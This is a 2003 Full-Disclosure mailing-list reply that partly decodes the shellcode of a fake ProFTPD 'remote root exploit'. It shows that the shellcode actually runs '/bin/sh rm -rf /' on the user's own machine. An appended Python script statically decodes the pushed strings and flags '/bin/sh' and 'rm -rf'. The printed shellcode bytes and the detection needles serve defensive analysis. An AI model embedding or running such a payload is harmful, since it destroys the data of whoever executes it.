Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
- To: GARCIA Lionel <lionel.garcia@airbus.com>
- Subject: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
- From: Philipp Buehler <pb+full-disclosure@mlsub.buehler.net>
- Date: Fri, 24 Oct 2003 17:34:53 +0200
On 24/10/2003, GARCIA Lionel <lionel.garcia@airbus.com> wrote To
full-disclosure@lists.netsys.com:
> ---> void(*sleep)()=(void*)sc;sleep(5); <------- Hummm :-\
obscure the obvious :)
> The shellcode seems to be locally launched. Anybody to "decrypt" the
> shellcode ?
Well, not "fully", since this already gives enough clues:
\x31\xc0                xorl  %eax,%eax
\x50                    pushl %eax
\x68\x66\x20\x2f\x58    pushl $0x66202f58   !"f /X"
\x68\x6d\x20\x2d\x72    pushl $0x6d202d72   !"m -r"
\x68\x2d\x63\x58\x72    pushl $0x2d635872   !"rcXr"
\x68\x41\x41\x41\x41    pushl $0x41414141   !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141   !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141   !"AAAA"
\x68\x41\x41\x41\x41    pushl $0x41414141   !"AAAA"
\x68\x2f\x73\x68\x43    pushl $0x2f736843   !"/shC"
\x68\x2f\x62\x69\x6e    pushl $0x2f62696e   !"/bin"
\x31\xc0                xorl  %eax,%eax
Then some "creative hopping" to connect this to an "/bin/sh rm -rf /"
If shellcode matches 0x72, 0x6d, 0x2d and 0x66 .. always be "alerted" :>
'LOVE' in the air ... :)
ciao
--
Philipp Buehler, aka fips | <double-p>
When the horse dies, get off.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
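
Added example, not part of the original message or of the posted exploit: a small triage script that does the manual decode above mechanically, so a "proof of concept" can be inspected before anyone compiles it. It walks only the three opcode forms listed in the post, rebuilds the string the pushes leave on the stack, and checks it for command fragments. The function names and the needle list are assumptions of this example; the sample bytes are the ones quoted in the message.

```python
# Added example: static decode of x86 "push imm32" stack strings.
# Only the opcode forms shown in the post are handled; anything else stops the sweep.

# Bytes exactly as listed in the message (the rest of the shellcode is not on the page).
SAMPLE = bytes.fromhex("".join([
    "31c0", "50",
    "6866202f58", "686d202d72", "682d635872",
    "6841414141" * 4,
    "682f736843", "682f62696e", "31c0",
]))

def pushed_dwords(code):
    """Linear sweep; return (offset, 4 immediate bytes) for each push imm32."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op == 0x68 and i + 5 <= len(code):        # push imm32
            out.append((i, code[i + 1:i + 5]))
            i += 5
        elif op == 0x31 and i + 2 <= len(code) and code[i + 1] >= 0xC0:
            i += 2                                   # xor reg,reg (register ModRM only)
        elif 0x50 <= op <= 0x57:                     # push reg
            i += 1
        else:
            break                                    # unknown opcode: do not guess
    return out

def stack_string(code):
    """Bytes as they end up in memory: the last push sits at the lowest address."""
    return b"".join(imm for _, imm in reversed(pushed_dwords(code)))

def suspicious(code, needles=(b"/bin/sh", b"rm -rf")):
    """Return the needles (hypothetical list, extend as needed) found on the stack."""
    s = stack_string(code)
    return [n for n in needles if n in s]

if __name__ == "__main__":
    for off, imm in pushed_dwords(SAMPLE):
        print(f"{off:3d}  push  {imm.hex()}  {imm!r}")
    print("stack :", stack_string(SAMPLE))
    print("flags :", suspicious(SAMPLE))
```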